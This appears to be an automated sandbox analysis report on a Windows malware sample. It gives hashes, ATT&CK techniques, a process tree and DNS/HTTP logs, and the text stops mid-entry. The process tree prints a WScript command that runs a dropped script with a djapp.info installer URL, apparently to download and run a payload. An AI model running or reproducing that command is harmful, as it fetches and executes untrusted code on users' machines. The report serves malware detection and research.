91a34986c15dc37ac33b15e677f21940d992cf2c31b5af85d9ead18b251ef8a0

Analysis

max time kernel
134s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
31/05/2024, 09:51 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe
Size

184KB
MD5

8695849edc287a9761aea3bab6a6feb1
SHA1

83bab866fb8ad5bc85e3024133799ff6d45add46
SHA256

91a34986c15dc37ac33b15e677f21940d992cf2c31b5af85d9ead18b251ef8a0
SHA512

ddb6ccf813f7d7a7f888417569c3fe5e4953ba832b1581231c5016062859292fe4d7c3faf9d98dd0c8987fe2c43c45501c7740ff80404b21d4286cafe30479b2
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3r:/7BSH8zUB+nGESaaRvoB7FJNndnO

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
6	1588	WScript.exe
38	4576	WScript.exe
40	3532	WScript.exe
52	3152	WScript.exe
54	4840	WScript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2236 wrote to memory of 1588	2236	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	82
PID 2236 wrote to memory of 1588	2236	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	82
PID 2236 wrote to memory of 1588	2236	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	82
PID 2236 wrote to memory of 4576	2236	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	95
PID 2236 wrote to memory of 4576	2236	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	95
PID 2236 wrote to memory of 4576	2236	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	95
PID 2236 wrote to memory of 3532	2236	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	96
PID 2236 wrote to memory of 3532	2236	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	96
PID 2236 wrote to memory of 3532	2236	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	96
PID 2236 wrote to memory of 3152	2236	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	99
PID 2236 wrote to memory of 3152	2236	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	99
PID 2236 wrote to memory of 3152	2236	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	99
PID 2236 wrote to memory of 4840	2236	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	100
PID 2236 wrote to memory of 4840	2236	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	100
PID 2236 wrote to memory of 4840	2236	8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe	100

C:\Users\Admin\AppData\Local\Temp\8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2236
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe
  2⤵
  - Blocklisted process makes network request
  PID:1588
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe
  2⤵
  - Blocklisted process makes network request
  PID:4576
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe
  2⤵
  - Blocklisted process makes network request
  PID:3532
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe
  2⤵
  - Blocklisted process makes network request
  PID:3152
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe
  2⤵
  - Blocklisted process makes network request
  PID:4840

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

www.djapp.info

WScript.exe

Remote address:

8.8.8.8:53

Request

www.djapp.info

IN A

Response
DNS

bi.downthat.com

WScript.exe

Remote address:

8.8.8.8:53

Request

bi.downthat.com

IN A

Response

bi.downthat.com

IN CNAME

traff-2.hugedomains.com

traff-2.hugedomains.com

IN CNAME

hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com

hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com

IN A

3.130.253.23

hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com

IN A

3.130.204.160
GET

http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

WScript.exe

Remote address:

3.130.253.23:80

Request

GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: bi.downthat.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

content-length: 0
date: Fri, 31 May 2024 09:51:14 GMT
location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
DNS

www.hugedomains.com

WScript.exe

Remote address:

8.8.8.8:53

Request

www.hugedomains.com

IN A

Response

www.hugedomains.com

IN A

172.67.70.191

www.hugedomains.com

IN A

104.26.7.37

www.hugedomains.com

IN A

104.26.6.37
DNS

228.249.119.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

228.249.119.40.in-addr.arpa

IN PTR

Response
DNS

23.253.130.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.253.130.3.in-addr.arpa

IN PTR

Response

23.253.130.3.in-addr.arpa

IN PTR

ec2-3-130-253-23 us-east-2compute amazonawscom
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.dual-a-0034.a-msedge.net

g-bing-com.dual-a-0034.a-msedge.net

IN CNAME

dual-a-0034.a-msedge.net

dual-a-0034.a-msedge.net

IN A

204.79.197.237

dual-a-0034.a-msedge.net

IN A

13.107.21.237
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=1B834AF31E2D69D531A45E631F9668C3; domain=.bing.com; expires=Wed, 25-Jun-2025 09:51:15 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 89EF9A2B745D40058026FF2F5CFC4C20 Ref B: LON04EDGE0908 Ref C: 2024-05-31T09:51:15Z
date: Fri, 31 May 2024 09:51:15 GMT
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=1B834AF31E2D69D531A45E631F9668C3; _EDGE_S=SID=12A8F14E1DFE6F0121CAE5DE1C3E6E7E

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=DUezu6s2NXx1lXARAQZNY5x5o_X8JvkZfLImOc9eWgY; domain=.bing.com; expires=Wed, 25-Jun-2025 09:51:16 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E35DA7C48B504048A81B0152C3CCDAD0 Ref B: LON04EDGE0908 Ref C: 2024-05-31T09:51:16Z
date: Fri, 31 May 2024 09:51:16 GMT
GET

https://www.bing.com/aes/c.gif?RG=16c3a93125b949fd8d962a034bccd1ce&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T112332Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981

Remote address:

88.221.83.184:443

Request

GET /aes/c.gif?RG=16c3a93125b949fd8d962a034bccd1ce&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T112332Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981 HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=1B834AF31E2D69D531A45E631F9668C3

Response

HTTP/2.0 200

cache-control: private,no-store
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: A1BA0E349F0B455A9638F92E21D83B4C Ref B: DUS30EDGE0417 Ref C: 2024-05-31T09:51:16Z
content-length: 0
date: Fri, 31 May 2024 09:51:16 GMT
set-cookie: _EDGE_S=SID=12A8F14E1DFE6F0121CAE5DE1C3E6E7E; path=/; httponly; domain=bing.com
set-cookie: MUIDB=1B834AF31E2D69D531A45E631F9668C3; path=/; httponly; expires=Wed, 25-Jun-2025 09:51:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.b453dd58.1717149076.7ce5e78
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

72.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

72.32.126.40.in-addr.arpa

IN PTR

Response
GET

https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

Remote address:

88.221.83.184:443

Request

GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
host: www.bing.com
accept: */*
cookie: MUID=1B834AF31E2D69D531A45E631F9668C3; _EDGE_S=SID=12A8F14E1DFE6F0121CAE5DE1C3E6E7E; MSPTC=DUezu6s2NXx1lXARAQZNY5x5o_X8JvkZfLImOc9eWgY; MUIDB=1B834AF31E2D69D531A45E631F9668C3
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QWthbWFp
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1107
date: Fri, 31 May 2024 09:51:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.b453dd58.1717149077.7ce6296
DNS

237.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

237.197.79.204.in-addr.arpa

IN PTR

Response
DNS

184.83.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

184.83.221.88.in-addr.arpa

IN PTR

Response

184.83.221.88.in-addr.arpa

IN PTR

a88-221-83-184deploystaticakamaitechnologiescom
DNS

43.58.199.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.58.199.20.in-addr.arpa

IN PTR

Response
DNS

13.86.106.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.86.106.20.in-addr.arpa

IN PTR

Response
DNS

www.djapp.info

WScript.exe

Remote address:

8.8.8.8:53

Request

www.djapp.info

IN A

Response
DNS

www.djapp.info

WScript.exe

Remote address:

8.8.8.8:53

Request

www.djapp.info

IN A

Response
GET

http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

WScript.exe

Remote address:

3.130.253.23:80

Request

GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: bi.downthat.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

content-length: 0
date: Fri, 31 May 2024 09:51:28 GMT
location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
DNS

www.djapp.info

WScript.exe

Remote address:

8.8.8.8:53

Request

www.djapp.info

IN A

Response
GET

http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

WScript.exe

Remote address:

3.130.253.23:80

Request

GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: bi.downthat.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

content-length: 0
date: Fri, 31 May 2024 09:51:39 GMT
location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
DNS

86.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.23.85.13.in-addr.arpa

IN PTR

Response
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
DNS

www.djapp.info

WScript.exe

Remote address:

8.8.8.8:53

Request

www.djapp.info

IN A

Response
GET

http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

WScript.exe

Remote address:

3.130.253.23:80

Request

GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: bi.downthat.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

content-length: 0
date: Fri, 31 May 2024 09:51:51 GMT
location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
DNS

www.djapp.info

WScript.exe

Remote address:

8.8.8.8:53

Request

www.djapp.info

IN A

Response
GET

http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

WScript.exe

Remote address:

3.130.253.23:80

Request

GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: bi.downthat.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

content-length: 0
date: Fri, 31 May 2024 09:52:04 GMT
location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
DNS

240.197.17.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.197.17.2.in-addr.arpa

IN PTR

Response

240.197.17.2.in-addr.arpa

IN PTR

a2-17-197-240deploystaticakamaitechnologiescom
DNS

249.197.17.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

249.197.17.2.in-addr.arpa

IN PTR

Response

249.197.17.2.in-addr.arpa

IN PTR

a2-17-197-249deploystaticakamaitechnologiescom
DNS

29.243.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.243.111.52.in-addr.arpa

IN PTR

Response
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 415458
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 0F978301DD44494B80D2BA70EBAC885B Ref B: LON04EDGE0706 Ref C: 2024-05-31T09:52:55Z
date: Fri, 31 May 2024 09:52:55 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 430689
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E597BFFB31274B2B8745657D15644889 Ref B: LON04EDGE0706 Ref C: 2024-05-31T09:52:55Z
date: Fri, 31 May 2024 09:52:55 GMT
DNS

200.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.197.79.204.in-addr.arpa

IN PTR

Response

200.197.79.204.in-addr.arpa

IN PTR

a-0001a-msedgenet

3.130.253.23:80

http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

http

WScript.exe

691 B
283 B
6
3

HTTP Request

GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

HTTP Response

302
204.79.197.237:443

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB

tls, http2

2.5kB
9.0kB
20
17

HTTP Request

GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB

HTTP Response

204

HTTP Request

